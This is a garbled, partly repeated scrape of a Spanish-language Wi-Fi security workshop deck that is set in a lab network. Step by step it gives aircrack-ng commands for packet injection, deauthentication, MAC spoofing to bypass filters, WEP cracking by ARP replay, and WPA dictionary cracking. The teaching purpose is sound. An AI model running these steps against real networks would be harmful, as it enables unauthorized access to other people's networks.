httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 17: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 18: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

